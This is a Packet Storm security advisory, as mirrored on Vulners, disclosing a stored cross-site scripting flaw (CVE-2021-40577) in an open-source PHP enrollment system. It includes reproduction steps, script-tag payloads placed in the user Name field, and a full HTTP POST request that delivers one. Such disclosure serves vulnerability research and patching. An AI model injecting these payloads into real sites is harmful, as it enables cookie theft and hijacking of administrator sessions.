Lucene search

K

Online Enrollment Management System In PHP And PayPal 1.0 Cross Site Scripting

🗓️ 01 Dec 2021 00:00:00Reported by Tushar JadhavType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 297 Views

Online Enrollment Management System PHP PayPal 1.0 XS

Show more
Related
Code
`# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting  
# Date: 2021-08-31  
# Exploit Author: Tushar Jadhav  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html  
# Version: 1.0  
# Tested on: Windows 11  
# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/  
# CVE: CVE-2021-40577  
  
=============================================================================================================================  
  
Stored Cross-site scripting(XSS):  
  
Stored attacks are those where the injected script is permanently stored on  
the target servers,  
such as in a database, in a message forum, visitor log, comment field, etc.  
The victim then retrieves the malicious script from the server when it  
requests the stored information.  
Stored XSS is also sometimes referred to as Persistent XSS.  
  
==============================================================================================================================  
  
Attack vector:  
  
This vulnerability can result in the attacker can injecting the XSS payload  
in the User Registration section. Each time the admin login or basic user  
Login in the admin panel, the XSS triggers and attacker can able to steal  
the cookie according to the crafted payload.  
  
===============================================================================================================================  
  
Vulnerable Parameters: Name  
  
===============================================================================================================================  
  
Steps for reproducing:  
  
1. Go to add users section  
2. fill in the details. & put <script>alert(document.cookie)</script>  
payload in Name parameter.  
3. Once we click on save, We can see the XSS has been triggered.  
  
================================================================================================================================  
  
Request :  
  
POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1  
Host: 192.168.1.205:81  
Content-Length: 133  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.1.205:81  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer:  
http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3  
Connection: close  
  
deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=  
  
===================================================================================================================================  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Dec 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.001
297
.json
Report